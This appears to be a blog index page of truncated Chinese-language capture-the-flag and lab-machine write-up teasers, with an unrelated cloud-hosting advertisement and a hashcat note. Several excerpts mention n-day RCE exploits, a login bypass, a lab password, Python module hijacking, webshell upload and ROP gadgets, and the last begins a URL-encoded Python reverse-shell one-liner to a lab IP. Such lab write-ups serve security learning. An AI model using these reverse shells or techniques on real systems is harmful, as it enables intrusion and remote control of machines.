information [~] Starting Script(s) [>] Script to be run Some("nmap -vvv -p ") [~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 19:39 CST Initiating Ping Scan at 19:39 Scanning 10....

information port scan 通过网站icon发现是wordpress网站，可以使用wpscan扫描。这里我直接用nuclei扫描了。 上次打靶机的时候群友用了一次nuclei，发现效率挺高的哈哈（不是偷懒） 有一个现成的ndayRce。 user1 反弹一个shell回来，外围打点就算结束了hah。接下来才是超模的开始。 What is the...

Example hashes If you get a “line length exception” error in hashcat, it is often because the hash mode that you have requested does not match the hash. To verify, you can test your commands again...

企业云服务优选：DKDUN助您掌握数字未来 在这个万物互联的时代，云服务器已经成为企业数字化转型的核心驱动力。无论是中小型企业还是大型企业，对高性能、稳定可靠、经济实惠的云计算解决方案的需求与日俱增。而在众多IDC服务提供商中，DKDUN 凭借卓越的技术能力和优质服务脱颖而出，是您的不二之选！ 为什么选择DKDUN的云服务器？ 高性能：一流硬件，快速响应 DKDUN的云...

information port scan 浏览网页这里有提到一个网页应用，这里踩了一个大坑，因为linux下是区分大小写的，而我直接复制粘贴是没法访问这个网页。 查找发现这个网页应用存在登录绕过 https://gist.github.com/ChrisPritchard/4b6d5c70d9329ef116266a6c238dcb2d https...

information port scan 目录枚举发现特别的路径http://wonderland.thm/r/a/b/b/i/t user1 通过web源代码获得用户凭据alice:HowDothTheLittleCrocodileImproveHisShiningTail user2 劫持python模块提权 user3 再rabbit的目录下发现...

64位泄露libc vuln的buf变量存在溢出 64位函数传入的参数依次存在寄存器rdi,rsi,rdx (顺序从左到右),返回值存在rax中 bamuwe@qianenzhao:~/done/bjdctf_2020_babyrop$ ROPgadget --binary bjdctf_2020_babyrop --only 'pop|re...

information port scan 优化一下工作流，这个rustscan真的快。（以前🧌推荐的） robots.txt robots.txt中发现一个site_map路径。 没啥用啊 网站的主页也只有一个登录页面看起来能做文章。 对8081端口进行枚举，发现了两个可能能利用的路径，一个auth，经过尝试应该和31331端口的是一个接口，ping目录...

information port scan 通过子域名爆破发现一个子域名，得到用户邮箱和密码。web/[andre@cmess.thm:KPFTN_f2yxe%] user1 在主域下发现cms框架为gila cms。搜索发现有一个nday，Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Auth...

information 端口扫描 panel 改个后缀就可以成功上传了，但是反弹shell居然用不了，可能是php版本问题，换个一句话🐎上去。 user1 python3%20-c%20’import%20os,pty,socket;s=socket.socket();s.connect((“10.14.95.76”,1234));[os....